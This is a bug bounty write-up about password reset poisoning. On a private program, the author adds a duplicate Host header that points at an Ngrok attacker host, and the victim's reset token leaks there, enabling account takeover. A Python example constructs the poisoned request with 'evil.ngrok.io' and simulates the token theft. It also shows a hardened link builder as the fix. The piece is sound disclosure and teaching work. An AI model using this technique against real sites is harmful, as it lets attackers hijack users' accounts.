Password Reset Poisoning leading to Account Takeover

Swapmaurya
3 min read · May 16, 2020


As mentioned in my previous blog, here is another post of mine on Account Takeover, this time through a different vector than the previous one.

So, getting started: the day after I achieved my first P1 on Bugcrowd (an IDOR leading to Account Takeover), I got a private program invite with a wildcard domain in scope. I opened the main domain and went through the whole web application and how it worked. The first thing I tried was the reset-password trick from my previous blog, but there was no such workflow here, so I logged off for the day and took a break for some days.

Two days later I received an email saying that the program was being paused for some days. As usual I went to college, and while we were discussing recent bug bounty tip tweets, Pratik gave me an idea about a Host header injection bypass. After college I went back and tried it on the private program, and luckily it worked as expected. This vulnerability was marked as P2 by Bugcrowd since it required one-click user interaction.

Coming to the Proof of Concept: for this attack I used Burp Suite and Ngrok.

First I requested a password reset for the victim's account and captured that request in Burp, editing it before forwarding it. In the same request I added a second Host header, directly below the original one, with the Ngrok URL as its value. The application used this attacker-supplied host, rather than its own domain, when building the reset link.

Request having attacker Host

After the edited POST request is sent, the victim receives a reset-password email whose link points to the Ngrok domain (the attacker-controlled domain) instead of the real site.

Reset password containing attacker URL received by Victim

As soon as the victim clicks the link, the browser sends the reset token, which sits in the URL, to the attacker-controlled server, where it shows up in the request log. The Ngrok endpoint does not need to serve anything useful; the single GET request is enough.

Ngrok server controlled by attacker

As you can see in the above image, the victim's password reset token is leaked to the attacker-controlled server. The attacker then submits that token to the legitimate site's reset endpoint, sets a new password, and takes over the victim's whole account.
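The whole chain above (a reset request carrying two Host headers, a server that builds the link from the wrong one, the victim's click handing the token to the attacker's log) is shown below as an added example; this is not the author's code or the target's code. The request bytes, the hostnames `app.example.com` and `evil.ngrok.io`, and the `/forgot-password` and `/reset-password` paths are constructed for illustration. The vulnerable link builder takes the last Host header seen; the hardened one ignores the request entirely and uses a configured canonical origin, which is the standard fix for reset poisoning.

```python
"""Password reset poisoning via a duplicate Host header: vulnerable vs hardened link builder."""
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Assumption: the application's real origin, configured once, never read from the request.
CANONICAL_HOST = "app.example.com"

# Constructed sample of the edited reset request (not the author's Burp capture).
# The second Host header is the attacker's Ngrok hostname.
POISONED_REQUEST = (
    b"POST /forgot-password HTTP/1.1\r\n"
    b"Host: app.example.com\r\n"
    b"Host: evil.ngrok.io\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"\r\n"
    b"email=victim%40example.com"
)


def parse_request(raw: bytes) -> Tuple[str, str, List[Tuple[str, str]]]:
    """Minimal HTTP/1.1 request parser that keeps header order and duplicates."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: List[Tuple[str, str]] = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return method, target, headers


def header_values(headers: List[Tuple[str, str]], name: str) -> List[str]:
    return [v for n, v in headers if n == name.lower()]


def build_reset_link_vulnerable(headers: List[Tuple[str, str]], token: str) -> str:
    """Bug: derives the link's origin from the request, taking the LAST Host header seen.
    Any attacker-controlled host (duplicate Host, and in other stacks X-Forwarded-Host)
    ends up in the email the victim receives."""
    host = header_values(headers, "host")[-1]
    return f"https://{host}/reset-password?token={token}"


def build_reset_link_hardened(headers: List[Tuple[str, str]], token: str) -> str:
    """Fix: reject ambiguous requests and build the link from the configured origin only."""
    hosts = header_values(headers, "host")
    if len(hosts) != 1 or hosts[0].lower() != CANONICAL_HOST:
        raise ValueError(f"unexpected Host header(s): {hosts}")
    return f"https://{CANONICAL_HOST}/reset-password?token={token}"


def extract_leaked_token(request_line: str) -> Optional[str]:
    """What the attacker pulls out of the Ngrok log line when the victim follows the link."""
    _method, target, _version = request_line.split(" ", 2)
    return parse_qs(urlsplit(target).query).get("token", [None])[0]


def simulate_victim_click(link: str) -> str:
    """The request line the victim's browser sends to the host named in the link."""
    parts = urlsplit(link)
    return f"GET {parts.path}?{parts.query} HTTP/1.1"


def run_chain(token: str) -> Tuple[str, Optional[str], bool]:
    """Returns (poisoned link, token as seen by attacker, whether the hardened builder accepted)."""
    _m, _t, headers = parse_request(POISONED_REQUEST)
    link = build_reset_link_vulnerable(headers, token)
    leaked = extract_leaked_token(simulate_victim_click(link))
    try:
        build_reset_link_hardened(headers, token)
        hardened_accepted = True
    except ValueError:
        hardened_accepted = False
    return link, leaked, hardened_accepted


if __name__ == "__main__":
    poisoned, seen_by_attacker, accepted = run_chain("demo-token-123")
    print("link mailed to victim:", poisoned)
    print("token in attacker log:", seen_by_attacker)
    print("hardened builder accepted request:", accepted)
```

When testing a real target, the hardened builder's behaviour is what you want to see: a reset email whose link always carries the site's own origin no matter what Host, X-Forwarded-Host or duplicate Host values the request carried. If the emailed link changes with any of those, the reset flow is poisonable exactly as described in this post.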

Stay updated with me on Twitter

Hope you may have liked it!
Thank you for reading.

